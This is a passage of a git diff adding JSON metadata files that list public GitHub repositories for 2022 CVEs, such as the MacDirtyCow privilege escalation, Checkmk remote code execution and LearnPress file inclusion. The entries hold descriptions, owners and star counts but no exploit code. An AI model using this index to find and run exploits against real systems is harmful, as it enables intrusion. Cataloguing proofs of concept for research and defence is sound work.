"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46505.json b/2022/CVE-2022-46505.json new file mode 100644 index 0000000000..72a66694c3 --- /dev/null +++ b/2022/CVE-2022-46505.json @@ -0,0 +1,33 @@ +[ + { + "id": 588404620, + "name": "details-for-CVE-2022-46505", + "full_name": "SmallTown123\/details-for-CVE-2022-46505", + "owner": { + "login": "SmallTown123", + "id": 101922357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101922357?v=4", + "html_url": "https:\/\/github.com\/SmallTown123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SmallTown123\/details-for-CVE-2022-46505", + "description": "MatrixSSL session resume bug", + "fork": false, + "created_at": "2023-01-13T03:07:52Z", + "updated_at": "2023-01-13T03:07:52Z", + "pushed_at": "2023-01-13T03:38:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46604.json b/2022/CVE-2022-46604.json new file mode 100644 index 0000000000..3b7ec6b032 --- /dev/null +++ b/2022/CVE-2022-46604.json @@ -0,0 +1,37 @@ +[ + { + "id": 596935402, + "name": "ResponsiveFileManager-CVE-2022-46604", + "full_name": "galoget\/ResponsiveFileManager-CVE-2022-46604", + "owner": { + "login": "galoget", + "id": 8353133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4", + "html_url": "https:\/\/github.com\/galoget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galoget\/ResponsiveFileManager-CVE-2022-46604", + "description": "Responsive FileManager v.9.9.5 vulnerable to CVE-2022-46604.", + "fork": false, + "created_at": "2023-02-03T08:56:16Z", + "updated_at": "2024-05-20T03:36:32Z", + "pushed_at": "2023-04-09T23:34:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "python3", + "responsivefilemanager" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46622.json b/2022/CVE-2022-46622.json new file mode 100644 index 0000000000..22e5f94bfb --- /dev/null +++ b/2022/CVE-2022-46622.json @@ -0,0 +1,33 @@ +[ + { + "id": 585254254, + "name": "CVE-2022-46622", + "full_name": "sudoninja-noob\/CVE-2022-46622", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-46622", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:52:13Z", + "updated_at": "2023-01-04T17:52:13Z", + "pushed_at": "2023-01-04T17:52:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46623.json b/2022/CVE-2022-46623.json new file mode 100644 index 0000000000..c6d9b6625f --- /dev/null +++ b/2022/CVE-2022-46623.json @@ -0,0 +1,33 @@ +[ + { + "id": 585254938, + "name": "CVE-2022-46623", + "full_name": "sudoninja-noob\/CVE-2022-46623", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-46623", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:54:29Z", + "updated_at": "2023-01-04T17:54:29Z", + "pushed_at": "2023-01-04T17:54:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46638.json b/2022/CVE-2022-46638.json new file mode 100644 index 0000000000..17f53139c8 --- /dev/null +++ b/2022/CVE-2022-46638.json @@ -0,0 +1,33 @@ +[ + { + "id": 171027294, + "name": "CVE-2022-46638", + "full_name": "naonymous101\/CVE-2022-46638", + "owner": { + "login": "naonymous101", + "id": 47696460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47696460?v=4", + "html_url": "https:\/\/github.com\/naonymous101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/naonymous101\/CVE-2022-46638", + "description": "Blog Pribadi", + "fork": false, + "created_at": "2019-02-16T16:50:50Z", + "updated_at": "2023-03-05T15:11:00Z", + "pushed_at": "2023-03-05T15:20:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46689.json b/2022/CVE-2022-46689.json new file mode 100644 index 0000000000..df8c40eb67 --- /dev/null +++ b/2022/CVE-2022-46689.json @@ -0,0 +1,455 @@ +[ + { + "id": 579424048, + "name": "MacDirtyCowDemo", + "full_name": "zhuowei\/MacDirtyCowDemo", + "owner": { + "login": "zhuowei", + "id": 704768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/704768?v=4", + "html_url": "https:\/\/github.com\/zhuowei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuowei\/MacDirtyCowDemo", + "description": "Get root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple's XNU source.", + "fork": false, + "created_at": "2022-12-17T16:45:24Z", + "updated_at": "2024-11-27T21:45:01Z", + "pushed_at": "2022-12-21T17:53:19Z", + "stargazers_count": 393, + "watchers_count": 393, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 393, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 581591800, + "name": "McDirty", + "full_name": "ahkecha\/McDirty", + "owner": { + "login": "ahkecha", + "id": 58378453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58378453?v=4", + "html_url": "https:\/\/github.com\/ahkecha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahkecha\/McDirty", + "description": "CVE-2022-46689 POC", + "fork": false, + "created_at": "2022-12-23T16:44:44Z", + "updated_at": "2024-02-16T11:03:17Z", + "pushed_at": "2022-12-23T16:48:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582165833, + "name": "NoCameraSound", + "full_name": "straight-tamago\/NoCameraSound", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/NoCameraSound", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2022-12-26T00:08:55Z", + "updated_at": "2024-10-17T13:17:03Z", + "pushed_at": "2023-10-10T16:53:48Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 120, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 582233201, + "name": "WDBFontOverwrite", + "full_name": "ginsudev\/WDBFontOverwrite", + "owner": { + "login": "ginsudev", + "id": 25361391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25361391?v=4", + "html_url": "https:\/\/github.com\/ginsudev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ginsudev\/WDBFontOverwrite", + "description": "Proof-of-concept app to overwrite fonts on iOS using CVE-2022-46689.", + "fork": false, + "created_at": "2022-12-26T06:56:35Z", + "updated_at": "2024-11-14T06:06:01Z", + "pushed_at": "2023-08-02T09:35:14Z", + "stargazers_count": 886, + "watchers_count": 886, + "has_discussions": false, + "forks_count": 73, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 73, + "watchers": 886, + "score": 0, + "subscribers_count": 25 + }, + { + "id": 583139600, + "name": "FileManager", + "full_name": "mineek\/FileManager", + "owner": { + "login": "mineek", + "id": 84083936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84083936?v=4", + "html_url": "https:\/\/github.com\/mineek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mineek\/FileManager", + "description": "File Manager for CVE-2022-46689", + "fork": false, + "created_at": "2022-12-28T22:13:35Z", + "updated_at": "2024-11-16T12:43:23Z", + "pushed_at": "2023-01-02T00:36:39Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 82, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 584925426, + "name": "NoHomeBar", + "full_name": "straight-tamago\/NoHomeBar", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/NoHomeBar", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2023-01-03T21:46:37Z", + "updated_at": "2024-10-16T22:12:00Z", + "pushed_at": "2023-01-19T08:04:02Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 67, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 585014885, + "name": "DockTransparent", + "full_name": "straight-tamago\/DockTransparent", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/DockTransparent", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2023-01-04T05:08:20Z", + "updated_at": "2024-09-30T13:25:37Z", + "pushed_at": "2023-01-19T08:12:40Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 52, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 585711274, + "name": "FileSwitcherX", + "full_name": "straight-tamago\/FileSwitcherX", + "owner": { + "login": "straight-tamago", + "id": 121408851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4", + "html_url": "https:\/\/github.com\/straight-tamago", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/straight-tamago\/FileSwitcherX", + "description": "CVE-2022-46689", + "fork": false, + "created_at": "2023-01-05T21:50:25Z", + "updated_at": "2024-10-31T21:24:05Z", + "pushed_at": "2023-06-13T08:55:50Z", + "stargazers_count": 144, + "watchers_count": 144, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ios" + ], + "visibility": "public", + "forks": 6, + "watchers": 144, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 588186913, + "name": "Mandela-Legacy", + "full_name": "BomberFish\/Mandela-Legacy", + "owner": { + "login": "BomberFish", + "id": 87151697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4", + "html_url": "https:\/\/github.com\/BomberFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BomberFish\/Mandela-Legacy", + "description": "iOS customization app powered by CVE-2022-46689", + "fork": false, + "created_at": "2023-01-12T14:31:30Z", + "updated_at": "2024-07-31T07:07:18Z", + "pushed_at": "2023-02-12T01:37:16Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-46689", + "dirtycow", + "exploit", + "ios", + "macdirtycow", + "swift", + "swiftui", + "tweak" + ], + "visibility": "public", + "forks": 2, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 592538980, + "name": "JailedCement", + "full_name": "BomberFish\/JailedCement", + "owner": { + "login": "BomberFish", + "id": 87151697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4", + "html_url": "https:\/\/github.com\/BomberFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BomberFish\/JailedCement", + "description": "Simple iOS bootlooper using CVE-2022-46689.", + "fork": false, + "created_at": "2023-01-23T23:58:00Z", + "updated_at": "2023-03-03T18:05:25Z", + "pushed_at": "2023-01-24T18:25:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 600600917, + "name": "Mandela-Classic", + "full_name": "BomberFish\/Mandela-Classic", + "owner": { + "login": "BomberFish", + "id": 87151697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4", + "html_url": "https:\/\/github.com\/BomberFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BomberFish\/Mandela-Classic", + "description": "iOS customization app powered by CVE-2022-46689. No jailbreak required.", + "fork": false, + "created_at": "2023-02-12T01:33:45Z", + "updated_at": "2024-07-15T05:18:43Z", + "pushed_at": "2023-02-12T01:33:48Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 608056893, + "name": "MacDirtyCow", + "full_name": "enty8080\/MacDirtyCow", + "owner": { + "login": "enty8080", + "id": 54115104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54115104?v=4", + "html_url": "https:\/\/github.com\/enty8080", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/enty8080\/MacDirtyCow", + "description": "Example of CVE-2022-46689 aka MacDirtyCow.", + "fork": false, + "created_at": "2023-03-01T08:23:49Z", + "updated_at": "2024-11-22T21:35:55Z", + "pushed_at": "2023-03-01T08:25:46Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-46689", + "exploit", + "jailbreak", + "macdirtycow", + "macos" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 628471421, + "name": "MDC", + "full_name": "tdquang266\/MDC", + "owner": { + "login": "tdquang266", + "id": 72800859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72800859?v=4", + "html_url": "https:\/\/github.com\/tdquang266", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tdquang266\/MDC", + "description": "I do some tweaking for iOS from 16.0 to 16.1.2 based on MacDirtyCow (CVE-2022-46689) exploit.", + "fork": false, + "created_at": "2023-04-16T03:33:38Z", + "updated_at": "2023-09-03T08:43:36Z", + "pushed_at": "2023-09-03T10:06:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634201810, + "name": "sw1tch", + "full_name": "69camau\/sw1tch", + "owner": { + "login": "69camau", + "id": 131466913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131466913?v=4", + "html_url": "https:\/\/github.com\/69camau", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/69camau\/sw1tch", + "description": "poc of CVE-2022-46689 written purely in swift", + "fork": false, + "created_at": "2023-04-29T11:21:40Z", + "updated_at": "2023-04-29T11:21:40Z", + "pushed_at": "2023-01-11T19:44:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46718.json b/2022/CVE-2022-46718.json new file mode 100644 index 0000000000..b1e4e92224 --- /dev/null +++ b/2022/CVE-2022-46718.json @@ -0,0 +1,33 @@ +[ + { + "id": 635000348, + "name": "cve-2022-46718-leaky-location", + "full_name": "biscuitehh\/cve-2022-46718-leaky-location", + "owner": { + "login": "biscuitehh", + "id": 507442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/507442?v=4", + "html_url": "https:\/\/github.com\/biscuitehh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biscuitehh\/cve-2022-46718-leaky-location", + "description": "CVE-2022-46718: an app may be able to read sensitive location information.", + "fork": false, + "created_at": "2023-05-01T18:34:52Z", + "updated_at": "2024-07-11T07:02:13Z", + "pushed_at": "2023-05-01T18:48:34Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46836.json b/2022/CVE-2022-46836.json new file mode 100644 index 0000000000..5bbcd22d88 --- /dev/null +++ b/2022/CVE-2022-46836.json @@ -0,0 +1,33 @@ +[ + { + "id": 620031715, + "name": "CVE-2022-46836_remote_code_execution", + "full_name": "JacobEbben\/CVE-2022-46836_remote_code_execution", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-46836_remote_code_execution", + "description": "Authenticated Remote Code Execution by abusing a single quote injection to write to an auth.php file imported by the NagVis component in Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29", + "fork": false, + "created_at": "2023-03-27T22:30:21Z", + "updated_at": "2023-03-28T00:31:50Z", + "pushed_at": "2023-03-28T01:41:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47102.json b/2022/CVE-2022-47102.json new file mode 100644 index 0000000000..e817d8993d --- /dev/null +++ b/2022/CVE-2022-47102.json @@ -0,0 +1,33 @@ +[ + { + "id": 585255498, + "name": "CVE-2022-47102", + "full_name": "sudoninja-noob\/CVE-2022-47102", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-47102", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:56:09Z", + "updated_at": "2023-01-04T17:56:09Z", + "pushed_at": "2023-01-04T17:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47130.json b/2022/CVE-2022-47130.json new file mode 100644 index 0000000000..3cda157597 --- /dev/null +++ b/2022/CVE-2022-47130.json @@ -0,0 +1,33 @@ +[ + { + "id": 859926326, + "name": "CVE-2022-47130", + "full_name": "OpenXP-Research\/CVE-2022-47130", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-47130", + "description": "Academy LMS <= 5.10 CSRF", + "fork": false, + "created_at": "2024-09-19T14:14:14Z", + "updated_at": "2024-09-19T14:14:40Z", + "pushed_at": "2024-09-19T14:14:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47131.json b/2022/CVE-2022-47131.json new file mode 100644 index 0000000000..d4689bf385 --- /dev/null +++ b/2022/CVE-2022-47131.json @@ -0,0 +1,33 @@ +[ + { + "id": 859925470, + "name": "CVE-2022-47131", + "full_name": "OpenXP-Research\/CVE-2022-47131", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-47131", + "description": "Academy LMS <= 5.10 CSRF \/ XSS", + "fork": false, + "created_at": "2024-09-19T14:12:43Z", + "updated_at": "2024-09-19T14:13:09Z", + "pushed_at": "2024-09-19T14:13:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47132.json b/2022/CVE-2022-47132.json new file mode 100644 index 0000000000..21e90cee55 --- /dev/null +++ b/2022/CVE-2022-47132.json @@ -0,0 +1,33 @@ +[ + { + "id": 859924903, + "name": "CVE-2022-47132", + "full_name": "OpenXP-Research\/CVE-2022-47132", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-47132", + "description": "Academy LMS <= 5.10 CSRF", + "fork": false, + "created_at": "2024-09-19T14:11:42Z", + "updated_at": "2024-09-19T14:12:11Z", + "pushed_at": "2024-09-19T14:12:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47197.json b/2022/CVE-2022-47197.json new file mode 100644 index 0000000000..30f24d8981 --- /dev/null +++ b/2022/CVE-2022-47197.json @@ -0,0 +1,64 @@ +[ + { + "id": 786354822, + "name": "CVE-2022-47197-2", + "full_name": "miguelc49\/CVE-2022-47197-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-47197-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:39Z", + "updated_at": "2024-04-14T17:39:26Z", + "pushed_at": "2024-04-14T17:39:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354836, + "name": "CVE-2022-47197-1", + "full_name": "miguelc49\/CVE-2022-47197-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-47197-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:42Z", + "updated_at": "2024-04-14T17:39:22Z", + "pushed_at": "2024-04-14T17:39:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47373.json b/2022/CVE-2022-47373.json new file mode 100644 index 0000000000..8c172b9891 --- /dev/null +++ b/2022/CVE-2022-47373.json @@ -0,0 +1,33 @@ +[ + { + "id": 602657363, + "name": "CVE-2022-47373", + "full_name": "Argonx21\/CVE-2022-47373", + "owner": { + "login": "Argonx21", + "id": 30073895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4", + "html_url": "https:\/\/github.com\/Argonx21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Argonx21\/CVE-2022-47373", + "description": "Reflected Cross Site Scripting Vulnerability in PandoraFMS <= v766", + "fork": false, + "created_at": "2023-02-16T17:10:25Z", + "updated_at": "2023-02-16T17:10:25Z", + "pushed_at": "2023-10-15T15:07:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47529.json b/2022/CVE-2022-47529.json new file mode 100644 index 0000000000..bd9934f8a4 --- /dev/null +++ b/2022/CVE-2022-47529.json @@ -0,0 +1,33 @@ +[ + { + "id": 618631888, + "name": "CVE-2022-47529", + "full_name": "hyp3rlinx\/CVE-2022-47529", + "owner": { + "login": "hyp3rlinx", + "id": 12366009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12366009?v=4", + "html_url": "https:\/\/github.com\/hyp3rlinx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hyp3rlinx\/CVE-2022-47529", + "description": "RSA NetWitness Platform EDR Agent \/ Incorrect Access Control - Code Execution", + "fork": false, + "created_at": "2023-03-24T22:50:26Z", + "updated_at": "2023-05-23T11:03:27Z", + "pushed_at": "2023-03-24T23:07:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47615.json b/2022/CVE-2022-47615.json new file mode 100644 index 0000000000..8a626ff0c5 --- /dev/null +++ b/2022/CVE-2022-47615.json @@ -0,0 +1,33 @@ +[ + { + "id": 680191554, + "name": "CVE-2022-47615", + "full_name": "RandomRobbieBF\/CVE-2022-47615", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-47615", + "description": "LearnPress Plugin < 4.2.0 - Unauthenticated LFI Description ", + "fork": false, + "created_at": "2023-08-18T15:04:36Z", + "updated_at": "2024-08-12T20:32:31Z", + "pushed_at": "2023-08-18T15:14:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-47872.json b/2022/CVE-2022-47872.json new file mode 100644 index 0000000000..4cdddac68c --- /dev/null +++ b/2022/CVE-2022-47872.json @@ -0,0 +1,33 @@ +[ + { + "id": 595891677, + "name": "CVE-2022-47872", + "full_name": "Cedric1314\/CVE-2022-47872", + "owner": { + 